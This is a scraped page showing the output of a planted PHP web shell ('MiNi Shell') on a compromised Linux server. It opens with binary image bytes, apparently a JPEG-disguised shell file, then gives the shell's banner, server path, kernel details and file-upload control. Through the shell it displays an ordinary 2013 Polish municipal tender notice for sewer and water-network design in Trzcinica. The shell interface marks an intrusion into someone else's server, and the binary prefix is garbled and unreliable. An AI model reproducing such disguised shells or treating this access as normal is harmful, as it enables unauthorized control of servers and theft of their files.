JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130327/121760-N-2013.html

<p class="kh_header"><b>Trzcinica: Wykonanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego  dla projektu - budowa sieci kanalizacji sanitarnej wraz z przykanalikami, remont i rozbudowa kanalizacji deszczowej, wymiana i rozbudowa sieci wodociągowej wraz z przyłączami i odbudową dróg  w m. Trzcinica,  wymiana sieci wodociągowej z AC na PCV wraz z przyłączami w m. Piotrówka, budowa sieci wodociągowej z przyłączami do m. Piła-Młyn</b><br>
<b>Numer ogłoszenia: 121760 - 2013; data zamieszczenia: 27.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Jana Pawła II 47, 63-620 Trzcinica, woj. wielkopolskie, tel. 062 7815011, faks 062 7815001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.trzcinica.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego  dla projektu - budowa sieci kanalizacji sanitarnej wraz z przykanalikami, remont i rozbudowa kanalizacji deszczowej, wymiana i rozbudowa sieci wodociągowej wraz z przyłączami i odbudową dróg  w m. Trzcinica,  wymiana sieci wodociągowej z AC na PCV wraz z przyłączami w m. Piotrówka, budowa sieci wodociągowej z przyłączami do m. Piła-Młyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : Wykonanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę oraz sprawowaniem nadzoru autorskiego  dla projektu - budowa sieci kanalizacji sanitarnej wraz z przykanalikami, remont i rozbudowa kanalizacji deszczowej, wymiana i rozbudowa sieci wodociągowej wraz z przyłączami i odbudową dróg  w m. Trzcinica,  wymiana sieci wodociągowej z AC na PCV wraz z przyłączami w m. Piotrówka, budowa sieci wodociągowej z przyłączami do m. Piła-Młyn.
Zamówieniem objęte jest również:
1)uzyskanie map ewidencyjnych gruntów wraz z wypisami z rejestru gruntów dla działek objętych inwestycją.
2)wszelkie opracowania i uzgodnienia niezbędne do uzyskania pozwolenia na budowę, ( w tym operaty  i pozwolenia wodnoprawne dotyczące odprowadzenia wód deszczowych oraz przekraczania cieków wodnych, decyzje środowiskowe oraz celu publicznego - warunki zabudowy itp. )
3)dokumentacje projektowe winny być zgodne z przepisami na dzień złożenia wniosku o wydanie decyzji o pozwolenia na budowę na poszczególne zakresy tj. na Trzcinicę, Piotrówkę i Piła-Młyn + Trzcinica, droga od hydroforni do drogi kierunek Granice,
4)rozwiązania projektowe mają być zgodne z zapisami decyzji o środowiskowych  uwarunkowaniach zgody na realizację przedsięwzięcia,
4.2.Zakres rzeczowy : 
     1) dł. projektowanej sieci kanalizacji sanitarnej w m.  Trzcinica - ok. 10 535 m i 320 szt przykanalików,        
          sieci  wodociągowej  - 10 985 m i 320 szt przyłączy  dł. projektowanej rozbudowy sieci deszczowej -  
          ok. 650 m , a  wymiana - 1 370 m  - pozwolenie na budowę 
       -  dł. projektowanej  sieci wodociagowej do m. Piła-Młyn -  ok. 800 m i 4 szt. przyłączy  -  pozwolenie na 
           budowę, 
 -   dł. projektowanej wymiany sieci wodociągowej  z AC na PCV w m. Piotrówka -  ok. 2 580 m i 88 szt.        
      przyłączy - pozwolenie na budowę,
 2)  projekty budowlane opracowane zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U.  
    z  2010r. Nr 243, poz. 1623 z późn. zm.) oraz Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca           
   2003r. w  sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133),
3)  przedmiary robót i specyfikacje techniczne wykonania i odbioru robót budowlanych opracowane             zgodnie z  Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych  (Dz. U. Nr 202, poz. 2072 z późn. zm.),
4)  kosztorysy inwestorskie opracowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389), 
     5)  informacje dotyczące bezpieczeństwa i ochrony zdrowia - na podstawie art. 21a ustawy z dnia 2 lipca    
     1994r. Prawo budowlane i przepisu wykonawczego, 
6) dokumentacja geotechniczna
4.3 Dokumentację projektową  należy wykonać w ilościach: 
                   a) koncepcję dokumentacji projektowej w 1 egz. + w wersji elektronicznej                                                                                                                                                                                                                                                                                       
b) projekt budowlany - 5 egz. w formie papierowej oraz 1 egz. w formie elektronicznej,
c) projekt drogowy (w zakresie napraw i odtworzenia nawierzchni, remont komór oraz wpustów ulicznych ponadto istniejące piaskowniki przeprojektować jako separatory  z których będą odprowadzone wody deszczowe do rowu),
                    d) projekt organizacji ruchu na czas budowy (w pasach dróg publicznych),
                    e) projekt kanalizacji sanitarnej (grawitacyjnej i tłocznej),
                    f) projekt przebudowy i rozbudowy sieci wodociągowej i deszczowej w obszarze objętym
                             miejscowym planem zagospodarowania dotyczy m. Trzcinica
                     g) projekty usunięcia kolizji z istniejącą i projektowaną infrastrukturą techniczną
                     h) opracowanie harmonogramu rzeczowo-finansowego realizacji inwestycji,
                             uwzględniającego etapowanie inwestycji jak również kosztorysów i przedmiarów,
                     i) przedmiar robót - 1 egz. w formie papierowej oraz 1 egz. w formie elektronicznej,
  j) kosztorys inwestorski - 1 egz. w formie papierowej oraz 1 egz. w formie elektronicznej,
  k) specyfikacja techniczna wykonania i odbioru robót - 1 egz. w formie papierowej oraz 1 egz.     
     w  formie elektronicznej,
                  l) dokumentacja geotechniczna - 1 egz. w formie papierowej oraz 1 egz. w formie elektronicznej.
Dokumentacje projektowe nie mogą zawierać znaków towarowych, patentów lub pochodzenia zastosowanych materiałów i urządzeń.
4.4 Formę elektroniczną dokumentacji projektowej należy zapisać w formacie .pdf
4.5 Dla wykonania powyższych opracowań wykonawca sporządzi:
a) mapy sytuacyjno-wysokościowe do celów projektowych konieczne dla wykonania przedmiotu zamówienia,
b) wykonanie niezbędnych badań geotechnicznych gruntu i opracowanie niezbędnej dokumentacji geotechnicznej,
c) uzyskanie opinii ZUD w Kępnie (łącznie z kosztami wypisów z rejestru gruntów),
d) przygotowanie danych do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację  przedsięwzięcia,
e) przygotowanie danych do wniosku o wydanie decyzji o lokalizacji inwestycji celu publicznego,
f) opracowanie Raportu o oddziaływaniu przedsięwzięcia na środowisko - o ile w toku  postępowania taka    
    konieczność nastąpi,
g) wykonanie operatu wodno - prawnego jeśli będzie konieczność jego wykonania,
g) uzyskanie wszelkich niezbędnych uzgodnień umożliwiających uzyskanie decyzji o pozwoleniu na budowę,
h) uzyskanie w imieniu Zamawiającego zgód właścicieli na wejście na grunt, zgoda ma mieć charakter pisemnego oświadczenia właściciela wraz z załącznikiem graficznym.
i) wykonać zaopiniowany i uzgodniony projekt organizacji ruchu drogowego na czas robót.
k) pełnienia nadzoru autorskiego nad realizacją projektów zgodnie z art. 20 ust 1 pkt 4 ustawy Prawo Budowlane.
4.6 Zamawiający nie posiada  decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia polegającego na opracowanie projektu sieci kanalizacji sanitarnej wraz z rozbudową i wymianą sieci wodociagowej i deszczowej miejscowości Trzcinica oraz do sieci wodociągowej w m. Piotrówka i Piła-Młyn
4.7  W czasie projektowania  należy uwzględnić uwarunkowania Miejscowowego Planu Zagospodarowania Przestrzennego przyjętego  Uchwała nr  XIX/111/04 Rady Gminy Trzcinica z dnia 27.09.2004 r. w rejonie: ul. Pocztowej, ul. Lipowej, ul. Kolejowej oraz torów kolejowych., Uchwała Nr  XXI/118/04 Rady Gminy Trzcinica z dnia 24.11.2004 r. wschodniej części wsi Trzcinica, Uchwała Nr XL/235/09 Rady Gminy Trzcinica z dnia 30 grudnia 2009r. w sprawie uchwalenia zmiany miejscowego planu zagospodarowania przestrzennego wschodniej części wsi Trzcinica, dla obszaru położonego w północnej części wsi,  - dostępne na stronie BIP zakładka prawo lokalne - Uchwały.                                                                                                                                                    Miejsowości Piotrówka oraz Piła-Młyn nie posiadają  Miejscowowego Planu Zagospodarowania Przestrzennego.

4.8 Zakres opracowania projektu sieci kanalizacji sanitarnej wraz z przykanalikami, remont i rozbudowa kanalizacji deszczowej, wymiana i rozbudowa sieci wodociągowej wraz z przyłączami i odbudową dróg  w m. Trzcinica,  wymiana sieci wodociągowej z AC na PCV wraz z przyłączami w m. Piotrówka, budowa sieci wodociągowej z przyłączami do m. Piła-Młyn, obejmuje obszar przedstawiony na  załączniku nr 9 do siwz  należy go jednak traktować w sposób przybliżony. Wykonawca przygotuje dokumentacje projektowo - kosztorysowe zgodnie z otrzymanymi na bieżąco zaleceniami i wskazówkami Zamawiającego.
Warunki:
 - istniejąca sieć ogólnospławna w m. Trzcinica winna spełniać rolę deszczowej należy sporządzić operat wodno-prawny w celu uzyskania pozwolenia na odprowadzenie wód deszczowych,  jednocześnie w miejscach uszkodzonej  sieci jej wymianę w miejscach wskazanych w załączniku, 
-  nowoprojektowane kolektory sanitarne należy włączyć zgodnie z rzędnymi przepompowni Nr 1oraz Nr 2 
- ostateczny zakres projektowanych sieci zostanie ustalony na podstawie kompletnego rozwiazania projektowego,  treść projektu zostanie zatwierdzona przez Zamawiajacego,
- na etapie projektowania i okreslania docelowych danych projektowych Zamawiajacy przewiduje wystapic z wnioskami o dofinansowanie realizacji zadania.
   Ewentualne projekty do jakich Zamawiajacy przewiduje złożyc projekt o dofinansowanie:
   1. Wielkopolski Regionalny Program Operacyjny 2014 - 2020
   2. Program Rozwoju Obszarów Wiejskich.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.22.00-3, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 3000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ustanowiona warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane  należycie;   Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres  prowadzenia działalności jest krótszy - w tym okresie, wykonał:  dokumentacje projektowe  które  obejmowały swoim zakresem zaprojektowanie sieci wodociągowej i kanalizacyjnej wraz z referencjami.Jako zadanie zgodne uważać się będzie wykonanie  projektów kanalizacji sanitarnej o dł. min. 2,5 km i średnicy 200 mm i powyżej, sieci wodociągowej o dł. min. 2,5 km i średnicy 110 mm i powyżej .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ustanowiona warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie
usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami :   
Wykonawca wykaże, że  dysponuje  projektantem z uprawnieniami bez ograniczeń w specjalności instalacyjnej - w   zakresie   sieci wodociągowych i kanalizacyjnych,  jako osobą przewidzianą na głównego projektanta, który wykonał  dokumentacje  projektowe zgodne z przedmiotem zamówienia. Jako zadanie zgodne uważać się będzie wykonanie  projektów kanalizacji sanitarnej o dł. min.2,5 km i średnicy 200 mm i powyżej, sieci wodociągowej o dł. min. 2,5 km i średnicy 110 mm i powyżej .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie ustanowiona warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy i cenowy (wg wzoru zał. nr 1 i 1a)  
Dowód wniesienia wadium
Pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień  umowy :
1) konieczności zlecania prac dodatkowych, w trybie zgodnym z przepisami ustawy Prawo zamówień publicznych;
2) zmiany przepisów powodujących konieczność zastosowania innych rozwiązań projektowych niż zakładano w opisie przedmiotu zamówienia;
3) zmiany przepisów powodujących konieczność uzyskania dodatkowych dokumentów, które te przepisy narzucają;
4) gdy organy i instytucje uwzględniające nie wydały uzgodnień w ustawowym terminie,
5)  zmiany nazwy zadania;
6) zmiany osób reprezentacyjnych, w przypadku zmian organizacyjnych lub zmiany nazwy *firmy Wykonawcy:
7) zmiany osób realizujących przedmiot zamówienia pod warunkiem, że osoby te będą spełniały wymagania określone w SIWZ;
8) w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego ( np. powoduje skrócenie terminu realizacji umowy, zmniejszenie wartości zamówienia, obniżenie wynagrodzenia );
9) zmiany urzędowej stawki VAT;
10) zmiany procentowej wysokości płatności faktury częściowej w przypadku przedłużenia terminu realizacji zadania niewynikającej z przyczyn leżących po stronie Wykonawcy;
11) zaistnienie przypadków losowych (np. kataklizmy, awarie urządzeń wywołane przez wyładowania atmosferyczne lub inne czynniki zewnętrzne, zgony i niemożliwe do przewidzenia wydarzenia), które będą miały wpływ na treść zawartej umowy i termin realizacji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://trzcinica.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Trzcinica
ul. Jana Pawła II 47
63-620 Trzcinica
I piętro, pokój nr 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2013 godzina 09:00, miejsce: Urząd Gminy Trzcinica
ul. Jana Pawła II 47
63-620 Trzcinica
parter, pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com